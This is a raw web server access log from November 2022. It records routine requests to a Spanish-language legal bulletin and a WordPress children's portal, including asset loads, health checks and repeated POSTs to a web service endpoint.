216.245.221.92 - - [14/Nov/2022:03:04:02 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [14/Nov/2022:03:07:01 -0500] "-" 408 -
172.22.2.4 - - [14/Nov/2022:03:05:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Nov/2022:03:08:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Nov/2022:03:06:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58185
216.245.221.92 - - [14/Nov/2022:03:09:02 -0500] "HEAD / HTTP/1.1" 200 -
71.6.232.23 - - [14/Nov/2022:03:11:40 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [14/Nov/2022:03:12:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Nov/2022:03:11:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:03:12:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53337
216.245.221.92 - - [14/Nov/2022:03:14:02 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.29 - - [14/Nov/2022:03:17:58 -0500] "-" 408 -
201.245.192.253 - - [14/Nov/2022:03:17:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Nov/2022:03:17:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/Nov/2022:03:19:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:03:18:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58185
201.245.192.253 - - [14/Nov/2022:03:21:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43662
201.245.192.253 - - [14/Nov/2022:03:21:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43465
201.245.192.253 - - [14/Nov/2022:03:22:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [14/Nov/2022:03:24:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:03:23:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:03:23:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
3.85.189.229 - - [14/Nov/2022:03:25:50 -0500] "GET /secretaria-de-ambiente-acompano-los-dialogos-regionales-vinculantes-para-san-cristobal-y-rafael-uribe-uribe.html HTTP/1.1" 200 984
3.85.189.229 - - [14/Nov/2022:03:25:50 -0500] "GET /secretaria-de-ambiente-acompano-los-dialogos-regionales-vinculantes-para-san-cristobal-y-rafael-uribe-uribe.html HTTP/1.1" 200 984
78.129.241.31 - - [14/Nov/2022:03:25:54 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [14/Nov/2022:03:27:47 -0500] "GET /BLA/boletinlegal/actuator/health HTTP/1.1" 404 1018
93.158.161.36 - - [14/Nov/2022:03:27:58 -0500] "-" 408 -
201.245.192.253 - - [14/Nov/2022:03:27:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [14/Nov/2022:03:29:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:03:28:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:03:29:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59779
201.245.192.253 - - [14/Nov/2022:03:31:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43662
201.245.192.253 - - [14/Nov/2022:03:31:33 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43465
206.84.187.77 - - [14/Nov/2022:03:32:55 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
206.84.187.77 - - [14/Nov/2022:03:32:55 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
201.245.192.253 - - [14/Nov/2022:03:32:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
206.84.187.77 - - [14/Nov/2022:03:32:56 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
206.84.187.77 - - [14/Nov/2022:03:32:55 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
206.84.187.77 - - [14/Nov/2022:03:32:55 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
206.84.187.77 - - [14/Nov/2022:03:33:10 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
20.231.101.203 - - [14/Nov/2022:03:31:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 63221
206.84.187.77 - - [14/Nov/2022:03:33:22 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
206.84.187.77 - - [14/Nov/2022:03:33:22 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
206.84.187.77 - - [14/Nov/2022:03:33:25 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
206.84.187.77 - - [14/Nov/2022:03:33:28 -0500] "GET /portaldeninos/wp-content/plugins/popup-maker/assets/css/site.min.css?ver=1.8.14 HTTP/1.1" 200 8260
206.84.187.77 - - [14/Nov/2022:03:33:31 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
206.84.187.77 - - [14/Nov/2022:03:33:08 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
206.84.187.77 - - [14/Nov/2022:03:32:53 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
206.84.187.77 - - [14/Nov/2022:03:33:34 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
206.84.187.77 - - [14/Nov/2022:03:33:35 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
206.84.187.77 - - [14/Nov/2022:03:33:38 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
206.84.187.77 - - [14/Nov/2022:03:33:39 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
206.84.187.77 - - [14/Nov/2022:03:33:39 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
206.84.187.77 - - [14/Nov/2022:03:33:39 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
206.84.187.77 - - [14/Nov/2022:03:33:38 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
206.84.187.77 - - [14/Nov/2022:03:33:40 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
206.84.187.77 - - [14/Nov/2022:03:33:38 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
206.84.187.77 - - [14/Nov/2022:03:33:46 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
206.84.187.77 - - [14/Nov/2022:03:33:32 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
206.84.187.77 - - [14/Nov/2022:03:33:50 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
206.84.187.77 - - [14/Nov/2022:03:33:50 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
206.84.187.77 - - [14/Nov/2022:03:33:51 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
206.84.187.77 - - [14/Nov/2022:03:33:51 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
206.84.187.77 - - [14/Nov/2022:03:33:51 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
206.84.187.77 - - [14/Nov/2022:03:33:51 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
206.84.187.77 - - [14/Nov/2022:03:33:50 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
206.84.187.77 - - [14/Nov/2022:03:33:52 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
206.84.187.77 - - [14/Nov/2022:03:33:53 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
206.84.187.77 - - [14/Nov/2022:03:33:53 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
206.84.187.77 - - [14/Nov/2022:03:33:53 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
206.84.187.77 - - [14/Nov/2022:03:33:53 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
206.84.187.77 - - [14/Nov/2022:03:33:57 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
206.84.187.77 - - [14/Nov/2022:03:33:58 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
206.84.187.77 - - [14/Nov/2022:03:33:58 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
206.84.187.77 - - [14/Nov/2022:03:33:58 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
